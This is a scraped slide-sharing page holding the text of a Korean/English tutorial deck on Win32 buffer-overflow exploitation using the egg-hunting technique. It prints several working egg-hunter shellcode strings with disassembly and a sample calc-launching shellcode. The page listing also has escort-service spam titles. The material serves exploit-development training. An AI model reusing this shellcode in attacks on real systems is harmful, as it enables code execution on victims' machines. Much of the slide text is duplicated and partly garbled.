HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendArshad QA
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 

Recently uploaded (20)

Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Clustering techniques data mining book ....
Clustering techniques data mining book ....Clustering techniques data mining book ....
Clustering techniques data mining book ....
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and Backend
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

  • 1. System Hacking & Reverse Engineering documented by h2spice h2spice@gmail.com [ Buffer Overflow - Egg Hunting ]
  • 2. Who am I Sanghwan,Ahn (h2spice) Works for LINE.Corp Carrying out research on the vulnerability (exploitation,hunt,analysis)
  • 3. 시스템 해킹 / 리버싱 Buffer Overflow 취약점 원리 Stack Overflow Heap Overflow Format String Bug Heap Overflow Use After Free Overwriting RET Overwriting SEH 익스플로잇(Win32/*NIX/ARM) Egg Hunting RTL ROP Heap Spraying 커리큘럼 소개 취약점 / 악성코드 분석 악성코드 분석 Software on X86 버그 헌팅 X86 ARM Mobile 취약점 분석 소스코드 분석 퍼징 CVE-XXXX-XXXX Exploit-DB Inj3ct0r - 1337day 리버스 엔지니어링 iOS Android Overwriting .dtors Overwriting GOT
  • 4. 목차 커리큘럼 소개 Track3 - Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROP Heap Spray Track3-2 *NIX Overwrite RET RTL Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET RTL ROP
  • 6. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 7. What is the Egg-Hunting ? 프로세스의 VAS(Virtual Address Space) 검색 기술 이용 공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용 (공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에) Egg Hunting 은 기본적으로 3가지의 코드로 구성 Egg Hunter Code Marker or Tag Arbitrary Shell Code Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 8. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag x77x30x30x74x77x30x30x74 (w00tw00t) Shell Code (Calc) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a
  • 9. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag (w00tw00t) + x77x30x30x74x77x30x30x74 Shell Code (Calc) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a
  • 10. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49
  • 11. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker
  • 12. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker " Store Marker’s Addr & Jump to there
  • 13. Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 " Store Marker’s Addr & Jump to there Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker # Execute Shell Code
  • 14. Important in order for Egg-Hunting to work 사용자 입력값으로부터 프로그램의 흐름을 제어 you must be able to jump to (jmp, call, push/ret) & execute some shellcode Egg-Hunter Code는 예측 가능한 메모리 영역에 위치 egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it) Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치 you must prepend the final shell code with a unique string/marker/tag 메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인 (IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe ckAndAuditAlarm) you’ll have to test which technique to search memory works for a particular exploit 버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요 the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter” 최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc) the final shell code must be available somewhere in memory Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 15. Track3. Exploitation Egg-Hunter using SEH injection Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-hunter Code using SEH injection EB21 jmp short 0x23 my $egghunter = "xebx21x59xb8". "w00t". “x51x6axffx33xdbx64x89x23". “x6ax02x59x8bxfbxf3xafx75". “x07xffxe7x66x81xcbxffx0f". “x43xebxedxe8xdaxffxffxff". “x6ax0cx59x8bx04x0cxb1xb8". “x83x04x08x06x58x83xc4x10". “x50x33xc0xc3"; 59 pop ecx B890509050 mov eax,0x50905090 ; this is the Marker 51 push ecx 6AFF push byte -0x1 33DB xor ebx,ebx 648923 mov [fs:ebx],esp 6A02 push byte +0x2 59 pop ecx 8BFB mov edi,ebx F3AF repe scasd 7507 jnz 0x20 FFE7 jmp edi 6681CBFF0F or bx,0xfff 43 inc ebx EBED jmp short 0x10 E8DAFFFFFF call 0x2 6A0C push byte +0xc 59 pop ecx 8B040C mov eax,[esp+ecx] B1B8 mov cl,0xb8 83040806 add dword [eax+ecx],byte +0x6 58 pop eax 83C410 add esp,byte+0x10 50 push eax 33C0 xor eax,eax C3 ret Egg hunter size = 60 bytes, Egg size = 8 bytes
  • 16. Track3. Exploitation Egg-Hunter using SEH injection Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) EB21 jmp short 0x23 59 pop ecx B890509050 mov eax,0x50905090 ; this is the Marker 51 push ecx 6AFF push byte -0x1 33DB xor ebx,ebx 648923 mov [fs:ebx],esp 6A02 push byte +0x2 59 pop ecx 8BFB mov edi,ebx F3AF repe scasd 7507 jnz 0x20 FFE7 jmp edi 6681CBFF0F or bx,0xfff 43 inc ebx EBED jmp short 0x10 E8DAFFFFFF call 0x2 6A0C push byte +0xc 59 pop ecx 8B040C mov eax,[esp+ecx] B1B8 mov cl,0xb8 83040806 add dword [eax+ecx],byte +0x6 58 pop eax 83C410 add esp,byte+0x10 50 push eax 33C0 xor eax,eax C3 ret Egg-hunter Code using SEH injection ! Move marker to EAX Egg hunter size = 60 bytes, Egg size = 8 bytes my $egghunter = "xebx21x59xb8". "w00t". “x51x6axffx33xdbx64x89x23". “x6ax02x59x8bxfbxf3xafx75". “x07xffxe7x66x81xcbxffx0f". “x43xebxedxe8xdaxffxffxff". “x6ax0cx59x8bx04x0cxb1xb8". “x83x04x08x06x58x83xc4x10". “x50x33xc0xc3"; " Repeat until find the Marker
  • 17. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using IsBadReadPtr Egg-hunter Code using IsBadReadPtr my $egghunter = “x33xdbx66x81". "xcbxffx0fx43x6ax08x53xb8". "x0dx5bxe7x77xffxd0x85xc0". "x75xecxb8". "w00t". “x8bxfbxafx75xe7xafx75xe4". "xffxe7"; 33DB xor ebx,ebx 6681CBFF0F or bx,0xfff 43 inc ebx 6A08 push byte +0x8 53 push ebx B80D5BE777 mov eax,0x77e75b0d FFD0 call eax 85C0 test eax,eax 75EC jnz 0x2 B890509050 mov eax,0x50905090 ; this is the Marker 8BFB mov edi,ebx AF scasd 75E7 jnz 0x7 AF scasd 75E4 jnz0x7 FFE7 jmp edi Egg hunter size = 37 bytes, Egg size = 8 bytes
  • 18. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using IsBadReadPtr 33DB xor ebx,ebx 6681CBFF0F or bx,0xfff 43 inc ebx 6A08 push byte +0x8 53 push ebx B80D5BE777 mov eax,0x77e75b0d FFD0 call eax 85C0 test eax,eax 75EC jnz 0x2 B890509050 mov eax,0x50905090 ; this is the Marker 8BFB mov edi,ebx AF scasd 75E7 jnz 0x7 AF scasd 75E4 jnz0x7 FFE7 jmp edi ! Move marker to EAX " Repeat until find the Marker Egg hunter size = 37 bytes, Egg size = 8 bytes Egg-hunter Code using IsBadReadPtr my $egghunter = “x33xdbx66x81". "xcbxffx0fx43x6ax08x53xb8". "x0dx5bxe7x77xffxd0x85xc0". "x75xecxb8". "w00t". “x8bxfbxafx75xe7xafx75xe4". "xffxe7";
  • 19. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtDisplayString Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x43x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A43 push byte +0x43 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes
  • 20. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtDisplayString 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A43 push byte +0x43 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi ! Move marker to EAX " Repeat until find the Marker Egg hunter size = 32 bytes, Egg size = 8 bytes Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x43x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7";
  • 21. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x02x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A02 push byte +0x02 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다. NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
  • 22. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x02x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A02 push byte +0x02 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다. NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html ! Move marker to EAX " Repeat until find the Marker
  • 23. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm)
  • 24. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ! 메모리 검색을 시작할 위치 지정
  • 25. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) " 다음 메모리 검색을 위해 주소 값을 증가
  • 26. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) # 현재 가리키고 있는 주소값을 스택에 저장
  • 27. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) $ NtAccessCheckAndAuditAlarm을 위해 0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출
  • 28. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) % 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인
  • 29. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) & EDX 값 복구
  • 30. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ' 접근위반 발생시 시작점(0x12cd6c)로 이구동
